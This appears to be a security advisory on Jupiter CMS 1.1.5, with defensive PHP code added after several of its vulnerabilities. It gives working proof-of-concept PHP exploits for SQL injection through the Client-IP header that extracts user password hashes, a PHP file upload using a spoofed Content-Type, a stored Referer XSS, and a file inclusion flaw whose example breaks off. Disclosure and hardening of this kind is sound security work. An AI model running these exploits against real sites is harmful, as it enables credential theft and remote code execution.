Title: Jupiter CMS 1.1.5 Multiple Vulnerabilities
Advisory ID: 12070214
Risk level: High
Author: DarkFig
exit;
}
magic_quotes_gpc is not applied to the $_SERVER array, so this can lead to an SQL
injection attack even if magic_quotes_gpc = On. One row of the SQL query's result
is returned to the user, so this is a plain SQL injection (not a blind one). This
simple PoC illustrates how an attacker can exploit this vulnerability:
# SQL Injection Vulnerability (POC #1)
#
require("phpsploitclass.php"); # See [1]
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$hev = "-1' UNION SELECT CONCAT('"
."[BEGIN_XPL_USER]',"
."(SELECT username FROM users LIMIT 0,1),'"
."[END_XPL_USER]','"
."[BEGIN_XPL_PWD]',"
."(SELECT password FROM users LIMIT 0,1),'"
."[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP",$hev);
$xpl->get($url);
preg_match("#\[BEGIN_XPL_USER\](.*)\[END_XPL_USER\]#",$xpl->getcontent(),$usr);
preg_match("#\[BEGIN_XPL_PWD\]([a-z0-9]{32})\[END_XPL_PWD\]#",$xpl->getcontent(),$pwd);
print $usr[1].'::'.$pwd[1];
#
# EOF POC #1
.: [ VULN #2 ]
Risk level: High
Summary: File Upload Vulnerability
Conditions: register_globals = On
All scripts located in the "modules" directory can be executed by a guest.
For example, look at the access protection in "modules/emoticons.php":
if(isset($is_guest) || isset($is_user))
{ header("location: $PHP_SELF?i=2"); exit; }
An attacker can access this script simply by sending a GET request which
contains the "is_guest" and "is_user" variables. Most of the time this is not
critical, because the script uses several functions stored in other files that
are not included, which results in a Fatal Error. But if the "a" parameter is
set to 1, the script "modules/emoticons.php" lets us upload a file before
producing the Fatal Error. Let's look at the upload protection:
$allowed_types = array('image/gif', 'image/jpeg', 'image/pjpeg', 'image/png', 'image/x-png');
if(!in_array($uploaded_file['type'],$allowed_types)){
header("location: $PHP_SELF?n=modules/emoticons&i=30");exit;
}
So all we have to do to bypass this protection is modify the "Content-Type"
header. This PoC illustrates how an attacker can upload a malicious PHP file:
# File Upload Vulnerability (POC #2)
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url,
"is_guest" => 1,
"is_user" => 1,
"a" => 1,
"req_file" => array(frmdt_filename => "iamaphpfile.php",
frmdt_type => "image/jpeg",
frmdt_content => ""));
$xpl->formdata($arr);
$xpl->get($url.'images/emoticons/iamaphpfile.php');
print($xpl->getcontent());
#
# EOF POC #2
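A defensive counterpart to the check in "modules/emoticons.php", added here as an example and not part of the advisory or of Jupiter CMS: the content type is sniffed from the file's bytes instead of the client-supplied header, and the stored name and extension are generated server-side. The `$_FILES['req_file']` entry and the `images/emoticons` target directory are assumptions taken from the PoC above.

```php
<?php
// Added hardening example (not Jupiter CMS code) for the upload check in
// "modules/emoticons.php". The original trusts $uploaded_file['type'], which
// is whatever Content-Type the client sent. This version inspects the bytes.
// Assumes a $_FILES entry named "req_file" and a target directory $dest_dir.

function validate_image_upload(array $file, string $dest_dir): ?string
{
    // Reject anything PHP itself flagged, and anything not really uploaded.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) return null;
    if (!is_uploaded_file($file['tmp_name'])) return null;

    // Sniff the real content type from the file's bytes, not from the header.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $real    = $finfo->file($file['tmp_name']);
    $allowed = ['image/gif' => 'gif', 'image/jpeg' => 'jpg', 'image/png' => 'png'];
    if (!isset($allowed[$real])) return null;

    // getimagesize() is a second, independent parser. Neither sniff defeats a
    // polyglot that is both a valid image and PHP, so the decisive control is
    // the server-chosen extension below (plus a web server rule that never
    // executes scripts from the upload directory).
    if (@getimagesize($file['tmp_name']) === false) return null;

    // Never reuse the client's file name: generate one, and force the
    // extension from the sniffed type so "something.php" can never land on disk.
    $name   = bin2hex(random_bytes(8)) . '.' . $allowed[$real];
    $target = rtrim($dest_dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) return null;
    return $name;
}

// Usage (after the access check, never before it):
// $stored = validate_image_upload($_FILES['req_file'] ?? [], __DIR__ . '/../images/emoticons');
// if ($stored === null) { header("Location: index.php?n=modules/emoticons&i=30"); exit; }
```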
.: [ VULN #3 ]
Risk level: Low
Summary: "Logged Guests" XSS
Conditions: None
The script "index.php" inserts (into the database) some information sent by
the web browser.
if(!isset($_SESSION['in_site']))
{
$db->insertRow("online",array('sid' => ''.$session_id.'',
'type' => 'live','status' => 'guest','user' => NULL,'user_id' => NULL,
'user_authorization' => NULL,'user_email' => NULL,'user_hideemail' => NULL,
'user_flag' => NULL,'user_location' => NULL,'ip' => ''.find_ip().'',
'refer' => ''.$_SERVER['HTTP_REFERER'].'','browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'',
'lang' => ''.$lang.'','date' => ''.time().''));
$db->insertRow("online",array('sid' => ''.$session_id.'','type' => 'log',
'status' => 'guest','user' => NULL,'user_id' => NULL,'user_authorization' => NULL,
'user_email' => NULL,'user_hideemail' => NULL,'user_flag' => NULL,'user_location' => NULL,
'ip' => ''.find_ip().'','refer' => ''.$_SERVER['HTTP_REFERER'].'',
'browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'','lang' => ''.$lang.'',
'date' => ''.time().''));
$_SESSION['in_site'] = 1;
}
All data inserted into the database is protected against SQL injection attacks;
however, it is not protected against XSS. This is a persistent XSS: the malicious
code will be executed when the admin clicks on "Logged Guest". Proof of concept:
# "Logged Guest" XSS Vulnerability (POC #3)
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->addheader("Referer", "");
$xpl->get($url);
#
# EOF POC #3
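The following is an added hardening example, not code from the advisory or from Jupiter CMS, covering both VULN #1 (Client-IP header spliced into SQL) and VULN #3 (Referer/User-Agent stored and later rendered unescaped). It rewrites the "online" row insert with bound parameters and adds output encoding for the "Logged Guests" page; the PDO handle `$db`, the `online` column names and the `$trusted_proxies` list are assumptions.

```php
<?php
// Added hardening example (not Jupiter CMS code) for VULN #1 and VULN #3:
// the "online" row insert rewritten so request headers are treated as data.
// Assumes a PDO handle $db and a table `online` with the columns used below.
// Choose the client IP without trusting spoofable headers: a proxy header is
// honoured only when REMOTE_ADDR is a known reverse proxy and the value is a
// syntactically valid IP; otherwise REMOTE_ADDR itself is used.
function client_ip(array $server, array $trusted_proxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (in_array($remote, $trusted_proxies, true)) {
        $raw   = $server['HTTP_CLIENT_IP'] ?? $server['HTTP_X_FORWARDED_FOR'] ?? '';
        $first = trim(explode(',', $raw)[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $remote;
}

// Length-limit free-form header values before storage (hygiene, not an XSS fix).
function clip(?string $value, int $max = 255): string
{
    return substr((string) $value, 0, $max);
}

function record_guest(PDO $db, array $server, string $session_id): void
{
    // Bound parameters: the header values never become part of the SQL text,
    // so neither magic_quotes_gpc nor manual escaping is relied on.
    $stmt = $db->prepare(
        'INSERT INTO online (sid, status, ip, refer, browser, date)
         VALUES (:sid, :status, :ip, :refer, :browser, :date)'
    );
    $stmt->execute([
        ':sid'     => $session_id,
        ':status'  => 'guest',
        ':ip'      => client_ip($server),
        ':refer'   => clip($server['HTTP_REFERER'] ?? null),
        ':browser' => clip($server['HTTP_USER_AGENT'] ?? null),
        ':date'    => time(),
    ]);
}

// Output encoding for the "Logged Guests" admin page: stored values are
// rendered as text, never as markup. ENT_QUOTES also covers attribute context.
function h(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
```

In the admin template every stored field goes through `h()`, e.g. `echo '<td>' . h($row['refer']) . '</td>';`, so a payload planted in the Referer header is displayed literally instead of executed.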
.: [ VULN #4 ]
Risk level: High
Summary: Local/Remote File Inclusion
Conditions: LFI: magic_quotes_gpc = Off
RFI: PHP >= 5.0.0, allow_url_fopen = On
The script "index.php" contains the following code:
if(isset($n))
{
if(file_exists("$n.php"))
{
if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
}
elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");
}
The "n" parameter isn't properly filtered, which can lead to file inclusion.
Local file inclusion works if magic_quotes_gpc=Off, because the null byte \x00
is required. Remote file inclusion works if the server is running PHP >= 5: in
that version, the file_exists() function can be used with some URL wrappers,
ftp:// for example. Simple PoC:
LFI: http://
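As an added example (not the advisory's or Jupiter CMS's own code), here is how the "n" include in "index.php" can be resolved safely: the name is restricted to a strict character set, resolved with realpath(), and checked to lie inside the directory of includable scripts. `$base_dir` and the `resolve_include` helper are assumptions; the `?i=error` redirect mirrors the original code.

```php
<?php
// Added hardening example (not Jupiter CMS code) for the "n" include in
// index.php. Instead of testing file_exists("$n.php") and searching for "../",
// it validates the requested name and verifies that the resolved path stays
// inside the directory of includable scripts ($base_dir, an assumed setting).

function resolve_include(string $n, string $base_dir): ?string
{
    // Only plain path segments are ever acceptable. This alone rejects "../",
    // "\0", "ftp://", "http://", drive letters and absolute paths.
    if (!preg_match('#\A[a-z0-9_]+(?:/[a-z0-9_]+)*\z#', $n)) {
        return null;
    }
    $base = realpath($base_dir);
    $path = realpath($base . '/' . $n . '.php');
    // realpath() returns false for missing files and collapses symlinks, so
    // the prefix check is done on the real location, not on the request.
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage in index.php: read "n" from the request explicitly (no register_globals),
// then include only what resolve_include() returned.
// $file = resolve_include($_GET['n'] ?? '', __DIR__);
// if ($file === null) { header("Location: index.php?i=error"); exit; }
// include $file;
```

With this check in place a request such as `?n=modules/emoticons` still resolves to the intended script, while traversal, null-byte and wrapper-based names never reach include().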